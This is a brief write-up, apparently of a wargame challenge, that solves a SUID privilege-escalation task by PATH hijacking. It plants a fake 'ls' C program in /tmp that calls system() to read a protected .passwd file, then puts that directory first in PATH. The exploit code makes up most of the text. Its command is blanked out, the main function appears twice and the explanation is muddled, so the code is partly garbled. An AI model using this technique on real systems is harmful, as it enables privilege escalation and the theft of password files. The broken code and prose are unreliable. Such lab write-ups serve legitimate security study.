It looks like that it can be solved by changing the "ls" command to "cat". However, since there is no "-l" option in "cat" command, "ls -lA" should be "cat".
SUID is in use.
I used the following method to change "ls -lA" to "cat".
1. Make a /tmp/tmpt/ls program to exploit.
#include<stdio.h>
int main() {
system("■■■ ■■■■■■■■■■■■■t/ch12/.passwd;");
return 0;
}
int main() {
system("■■■ ■■■■■■■■■■■■■t/ch12/.passwd;");
return 0;
}
2. Add /tmp/tmpt to PATH environment variable.
Clear!